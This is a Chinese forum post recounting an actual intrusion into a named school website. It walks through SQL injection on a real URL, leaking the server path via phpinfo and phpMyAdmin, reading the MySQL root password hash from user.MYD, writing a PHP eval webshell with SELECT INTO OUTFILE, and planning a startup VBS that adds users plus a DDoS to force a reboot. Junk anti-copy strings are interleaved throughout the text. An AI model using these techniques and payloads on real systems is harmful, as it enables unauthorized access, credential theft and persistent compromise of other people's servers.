第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
8 }" p! Z4 z) n! p" E发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!$ |' s3 b0 ~! [
: S3 n6 D. d* c# e* ~
: k! \' }4 Q0 i4 c) j/ k* A1 G; x+ Q: J5 V
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 6 J/ ^. O; `8 Y2 w: Z
4 p) c9 G7 p7 p: F
那么想可以直接写入shell ,getshell有几个条件:9 ^# c" T. V' e5 C+ u7 V9 U
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
& P0 n; |. ? O5 j
1 m- ~# F v7 r# W' d试着爆绝对路径: ' J$ ^% H5 O: [
1./phpMyAdmin/index.php?lang[]=1
8 O8 l1 C, R' @# {# e4 q; k+ j2./phpMyAdmin/phpinfo.php 0 O' U: J/ P, E
3./load_file()
* R# E: }; I" t; F& X4./phpmyadmin/themes/darkblue_orange/layout.inc.php
5 x' p3 d! }) W; A1 n! t5./phpmyadmin/libraries/select_lang.lib.php # E/ Q. C0 i6 F1 Q$ s( | k4 W
6./phpmyadmin/libraries/lect_lang.lib.php , f* v& J3 P$ n; k% {
7./phpmyadmin/libraries/mcrypt.lib.php
7 {( t- x* c) J% P7 M" d$ @5 Z8./phpmyadmin/libraries/export/xls.php F- o/ x+ S2 Q) N) u
1 k4 |6 V4 q6 N; J
均不行........................... 3 M$ X0 ^! e% u% w8 u: T( c/ z$ V, H
& K# \$ V) X" ~; O4 C御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
& [+ u( v; H9 o5 W H- V; X5 j9 A, z4 R
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
. N! \1 |. w7 k& D3 q6 L: [/ }% R2 p! G
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 ' d6 Y& C! g# C! V4 H/ S. F
) l, N/ W. [2 u1 Y9 T敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
( S% b7 C& H2 I3 }
$ @0 k! w$ t' T! {想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
k$ J* G/ S" J: I
4 \ i) W3 S8 w/ O4 ^) xhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 3 o& V, Z) [2 H% z
1 Q/ m3 u" b, x
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD % w2 E/ q4 h* L4 b
% j0 _, S7 y0 S/ M A$ K2 t, P% c
成功读到root密码: 9 v2 H+ Z$ d7 f% f
5 h& V' N& M% d+ Q- |17---- r(0072) 4 m a B) Q. a: c5 ?. S
18---- o(006f)
C- q% e; r% ` L b2 Z19---- o(006f)
7 ~; Y& f% U; k1 B* ~20---- t(0074) ' G0 _) l0 d) S8 }: t! X
21---- *(002a) ; S, W& m# ]8 A
22---- 8(0038) % I, L! O5 t: Q/ o& v* z; z
23---- 2(0032)
6 C* w* x f$ ^24---- E(0045)
* B; ~" u" g5 c+ g0 Q- F' @25---- 1(0031)
+ {2 Z( l4 _8 U6 Z b6 g26---- C(0043)
+ R4 w+ r$ P/ p) q# ~27---- 5(0035) , o) |! U4 r! O# t) M
28---- 8(0038) _/ O6 Y$ {0 e
29---- 2(0032) " L+ R: @& D- S2 y
30---- 8(0038)
' z. Y$ d( ?5 d' q. x9 E9 q31---- A(0041) 7 v& m1 l& V4 \4 H( ^8 l2 A8 i
32---- 9(0039)
: ~' g% z3 Q" Y33---- B(0042)
7 m Y& r. m% I. p$ z! J34---- 5(0035) , U8 H4 f- B9 v9 n: X* p
35---- 4(0034)
: L; k# ]/ `% A1 \/ `' y0 {" X36---- 8(0038) 3 R2 K9 A/ Q# O
37---- 6(0036)
( W6 d6 X' O t5 W4 y: v7 m( N38---- 4(0034)
- m- e& q: i% a# E. V7 i. S0 l! M8 A39---- 9(0039)
N3 j9 y$ P2 h0 A* @$ q1 l! h; R40---- 1(0031)
( D6 q$ s7 M9 c M$ ~41---- 1(0031) " T q/ K6 x7 R0 ~" B
42---- 5(0035) 3 K! Y. g+ P0 @& C! V( D
43---- 3(0033) U0 b* M& p1 n, \
44---- 5(0035)
9 D$ L% H* e, K: p1 w# o4 f+ L# D45---- 9(0039)
2 G4 D+ n. B* g t) B# h9 e; B46---- 8(0038) ' C F2 h) M( a
47---- F(0046) 9 H/ s* R. r% Q" N
48---- F(0046)
& ?5 x6 k$ S+ B- [$ t' M. }) c+ L49---- 4(0034) 2 X0 D+ W5 ?) ^7 Y- R
50---- F(0046)
) v+ W% j9 N1 ~. Q51---- 0(0030) : v9 e# M# Z, Z! ]
52---- 3(0033) & V/ ]! |5 ~5 |; u
53---- 2(0032) ! Z; I2 h$ ]; J% F
54---- A(0041) ; V) e( f4 B. z
55---- 4(0034) ( e( ]/ q5 w% x9 s, H4 g
56---- A(0041) & n* ^3 v/ x) I; W+ k1 f
57---- B(0042)
1 {2 @# J5 t$ u58---- *(0044)
) ]2 v2 e- H7 n8 r59---- *(0035)
0 M' R, p6 A$ x60---- *(0041) % C# N! n+ ^3 P
61---- *0032) 7 n7 c, d4 h4 ^: `( w6 n/ C
$ X" P' v0 ?7 ^& n
解密后成功登陆phpmyamin
& F+ r; Y! L% Q, C4 Z* F9 C- S- e
|+ g1 v) ?6 d% m: s" |1 L8 P {( Y P
7 S f* _, I1 W0 a0 G/ f- O3 h- i7 }' P, N: Y7 E
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' & Y) ^; j' g6 \+ {1 L" l5 u* i% o5 g
/ l \. }, f. M! w; K7 L/ _成功执行,拿下shell,菜刀连接: , Q; b( `+ b1 H
6 v# q$ t8 i+ L0 P4 f1 ~7 W: ~+ T服务器不支持asp,aspx,php提权无果...................
$ `# q; D9 B% ?: ~9 ?: K; b
) z1 G7 Q: V7 V7 B+ C1 E9 I但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
: n7 t. S5 ~+ m7 {8 y服务器上已经有个隐藏帐号了 D3 R! `0 i; w
别名 administrators
* N( o8 C2 L0 J5 U5 j6 ^注释 管理员对计算机/域有不受限制的完全访问权
7 f- p: q/ a' T成员
7 M) Y2 V) s8 o# L( m9 j6 K3 m& a-------------------------------------------------------------------------------
4 ~* |7 t# J2 [' ^- gadmin: V$ v5 _# D5 W a, [
Administrator" X7 Y6 g# f& `( Y1 \+ X
slipper$ Z# J w+ r/ R$ c9 Z* K1 @
sqluser
n5 z0 V& I# a, r I命令成功完成。 : j$ c4 P# p& T, z5 S. w5 @
2 C' {! s1 D5 b1 X服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
) U( n T, ^2 V* t m
/ }( z4 y, G( `. n! Cddos服务器重启,不然就只能坐等服务器重启了...............................
9 t* q+ L& q6 n- d/ @0 w; M: n5 F. T; L$ J0 }8 d7 V
) T+ ?( |6 i+ D+ U+ S
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
